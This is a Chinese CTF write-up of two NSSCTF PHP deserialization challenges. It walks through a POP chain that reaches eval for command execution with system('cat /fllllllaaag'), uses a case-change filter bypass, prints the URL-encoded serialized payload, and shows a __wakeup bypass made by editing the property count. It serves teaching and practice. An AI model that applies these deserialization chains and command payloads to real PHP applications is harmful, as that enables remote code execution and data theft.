• NSSCTF-Web题目18(反序列化)


    目录

    [NISACTF 2022]babyserialize

    1、题目

    2、知识点

    3、思路

    [SWPUCTF 2022 新生赛]ez_ez_unserialize

    4、题目

    5、知识点

    6、思路


    [NISACTF 2022]babyserialize

    1、题目

    2、知识点

    反序列化、绕过过滤、命令执行

    3、思路
    1. include "waf.php";
    2. class NISA{
    3. public $fun="show_me_flag";
    4. public $txw4ever;
    5. public function __wakeup()
    6. {
    7. if($this->fun=="show_me_flag"){
    8. hint();
    9. }
    10. }
    11. function __call($from,$val){
    12. $this->fun=$val[0];
    13. }
    14. public function __toString()
    15. {
    16. echo $this->fun;
    17. return " ";
    18. }
    19. public function __invoke()
    20. {
    21. checkcheck($this->txw4ever);
    22. @eval($this->txw4ever);
    23. }
    24. }
    25. class TianXiWei{
    26. public $ext;
    27. public $x;
    28. public function __wakeup()
    29. {
    30. $this->ext->nisa($this->x);
    31. }
    32. }
    33. class Ilovetxw{
    34. public $huang;
    35. public $su;
    36. public function __call($fun1,$arg){
    37. $this->huang->fun=$arg[0];
    38. }
    39. public function __toString(){
    40. $bb = $this->su;
    41. return $bb();
    42. }
    43. }
    44. class four{
    45. public $a="TXW4EVER";
    46. private $fun='abc';
    47. public function __set($name, $value)
    48. {
    49. $this->$name=$value;
    50. if ($this->fun = "sixsixsix"){
    51. strtolower($this->a);
    52. }
    53. }
    54. }
    55. if(isset($_GET['ser'])){
    56. @unserialize($_GET['ser']);
    57. }else{
    58. highlight_file(__FILE__);
    59. }
    60. //func checkcheck($data){
    61. // if(preg_match(......)){
    62. // die(something wrong);
    63. // }
    64. //}
    65. //function hint(){
    66. // echo ".......";
    67. // die();
    68. //}
    69. ?>

    题目出现了代码,我们老规矩,逐个逐个进行分析

    1、NISA类

    __wakeup():在进行反序列化前会执行

    __invoke():类对象被当成函数时执行

    这个类里面有一个if条件,但条件满足时,会执行hint()

    重点是在__invoke(),里面有eval函数,这可以给我们执行系统命令,也是获取flag的入口

    2、TianXiWei类

    这一个类只有一个__wakeup()析构函数,但是有一个不存在的函数nisa()

    3、Ilovetxw类

    __call:在对象中调用一个不可访问方法时会执行

    __toString:类被当成字符串时被调用

    这一个类中__toString返回的是一个函数,__call有fun这个不存在的变量

    4、four类

    __set:对不存在或者不可访问的变量进行赋值就会自动调用

    这一类中有一个if条件,满足后将$a变成小写的字符串

    通过上面的这些类后,我们下面来捋一下,要怎么得到flag

    首先,要得到flag,就要执行系统函数,也就是要执行__invoke中的eval(txw4ever),要调用__invoke需要通过Ilovetxw类的 __toString,因为这个方法结果是返回一个函数,要调用__toString

    就要通过four类的__set,且要满足if条件,要调用__set需要通过Ilovetxw类的__call,要调用__call,需要TianXiWei类的__wakeup,因为里面有不存在的函数nias()

    payload如下:

    1. class NISA{
    2. //定义变量
    3. public $fun="show_me_flag";
    4. public $txw4ever;
    5. }
    6. class TianXiWei{
    7. //定义变量
    8. public $ext;
    9. public $x;
    10. }
    11. class Ilovetxw{
    12. //定义变量
    13. public $huang;
    14. public $su;
    15. }
    16. class four{
    17. //定义变量
    18. public $a="TXW4EVER";
    19. private $fun="sixsixsix"; //满足类中的if条件
    20. }
    21. $a=new NISA;
    22. $a->txw4ever='system("ls /");'; //将系统命令赋给变量txw4ever
    23. $b=new Ilovetxw;
    24. $b->su=$a; //将NISA类当成函数执行,调用__invoke
    25. $c=new four;
    26. $c->a=$b; //将Ilovetxw类当成字符串,调用__to_string
    27. $b=new Ilovetxw;
    28. $b->huang=$c; //将Ilovetxw类传给Ilovetxw类的huang变量,调用__set
    29. $d=new TianXiWei;
    30. $d->ext=$b; //Ilovetxw类传给TianXiWei的ext变量,调用__call
    31. echo urlencode(serialize($d)); //因为存在private属性的变量,可能存在一些不可见的字符,所以需要进行url编码
    32. ?>

    PHP 在线工具 | 菜鸟工具 (jyshare.com)

    代码最后给了我们提示

    这里执行了hint()函数,我们需要进行绕过,更改NISA类中的fun参数

    这里要绕过的原因:因为我们是要NISA类中__invoke里面的结果,也就是执行TianXiWei类的_wakeup,而不是NISA类中__wakeup

    这里的checkcheck()进行了正则比较,我们只能盲猜

    利用大小写绕过

    命令正常执行,得到文件

    cat /fllllllaaag

    完整的payload:

    1. class NISA{
    2. //定义变量
    3. public $fun="show_me_flag";
    4. public $txw4ever;
    5. }
    6. class TianXiWei{
    7. //定义变量
    8. public $ext;
    9. public $x;
    10. }
    11. class Ilovetxw{
    12. //定义变量
    13. public $huang;
    14. public $su;
    15. }
    16. class four{
    17. //定义变量
    18. public $a="TXW4EVER";
    19. private $fun="sixsixsix"; //满足类中的if条件
    20. }
    21. $a=new NISA;
    22. $a->txw4ever='System("cat /fllllllaaag");'; //将系统命令赋给变量txw4ever
    23. $a->fun="aaa";
    24. $b=new Ilovetxw;
    25. $b->su=$a; //将NISA类当成函数执行,调用__invoke
    26. $c=new four;
    27. $c->a=$b; //将Ilovetxw类当成字符串,调用__to_string
    28. $b=new Ilovetxw;
    29. $b->huang=$c; //将Ilovetxw类传给Ilovetxw类的huang变量,调用__set
    30. $d=new TianXiWei;
    31. $d->ext=$b; //Ilovetxw类传给TianXiWei的ext变量,调用__call
    32. echo urlencode(serialize($d)); //因为存在private属性的变量,可能存在一些不可见的字符,所以需要进行url编码
    33. ?>

    执行结果:

    O%3A9%3A%22TianXiWei%22%3A2%3A%7Bs%3A3%3A%22ext%22%3BO%3A8%3A%22Ilovetxw%22%3A2%3A%7Bs%3A5%3A%22huang%22%3BO%3A4%3A%22four%22%3A2%3A%7Bs%3A1%3A%22a%22%3BO%3A8%3A%22Ilovetxw%22%3A2%3A%7Bs%3A5%3A%22huang%22%3BN%3Bs%3A2%3A%22su%22%3BO%3A4%3A%22NISA%22%3A2%3A%7Bs%3A3%3A%22fun%22%3Bs%3A3%3A%22aaa%22%3Bs%3A8%3A%22txw4ever%22%3Bs%3A27%3A%22System%28%22cat+%2Ffllllllaaag%22%29%3B%22%3B%7D%7Ds%3A9%3A%22%00four%00fun%22%3Bs%3A9%3A%22sixsixsix%22%3B%7Ds%3A2%3A%22su%22%3BN%3B%7Ds%3A1%3A%22x%22%3BN%3B%7D

    得到flag:NSSCTF{17e0b531-db47-4e14-abac-9ae0a2e8e3ec}


    [SWPUCTF 2022 新生赛]ez_ez_unserialize

    4、题目

    5、知识点

    反序列化,__wakeup()绕过

    6、思路

    出现代码,我们进行代码审计

    X类有三个析构函数

    _construct:在类被实例化时调用

    __wakeup:在类被反序列化之前调用

    __destruct:在对象销毁后执行,这里面有highlight_file函数,并提示我们flag在fllllllag.php里面

    所以这个是读取flag的入口

    highlight_file()

    $_REQUEST可以读取GET方式或者POST方式的数据

    难点:我们需要将x=fllllllag.php,然后序列化,但是__wakeup在反序列化前被调用,那我们的赋值就失效了,就要考虑怎么绕过这个函数

    解决,序列化后更改序列对象的数量进行绕过

    payload如下:

    1. class X{
    2.     public $x;
    3. }
    4. $a=new X;
    5. $a->x="fllllllag.php";
    6. echo serialize($a); 
    7. ?>

    O:1:"X":1:{s:1:"x";s:13:"fllllllag.php";} 

    改成:O:1:"X":2:{s:1:"x";s:13:"fllllllag.php";} 

    • O代表对象,这里是序列化的一个对象,要序列化数组的就用A
    • 1表示的是类名的长度
    • "X"表示对是类名
    • 1表示类里面有1个属性也称为变量 (更改这里绕过__wakeup)
    • s表示字符串的长度
    • 比如s:1:"x" 这里表示的是 x属性名(变量名)为1个字符串长度 字符串 属性长度 属性值

    得到flag:NSSCTF{4812e4ce-01a5-4e02-9975-3d8bc10cdc40}


    这篇文章就先写到这里了,哪里不懂的或者哪里不足的欢迎指出

  • 相关阅读:
    kettle基础使用教程
    -求平均数-
    记录 mybatis plus QuerWapper使用 FIND_IN_SET
    Spring底层原理(一)
    图扑软件 3D 组态编辑器,低代码零代码构建数字孪生工厂
    53_Pandas中的条件替换值(where, mask)
    LeetCode 6222. 美丽整数的最小增量
    nodejs环境安装与配置记录
    Java面向对象(基础)-- 类的成员之三:构造器(Constructor)
    Java内存模型-JMM
  • 原文地址:https://blog.csdn.net/weixin_54055099/article/details/140038008